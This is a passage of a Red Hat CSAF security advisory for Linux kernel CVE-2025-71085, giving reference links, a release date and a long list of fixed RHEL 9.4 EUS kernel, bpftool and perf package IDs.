"summary": "https://www.cve.org/CVERecord?id=CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-71085",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71085"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71085-e6c1@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71085-e6c1@gregkh/T"
}
],
"release_date": "2026-01-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-11T01:14:40+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
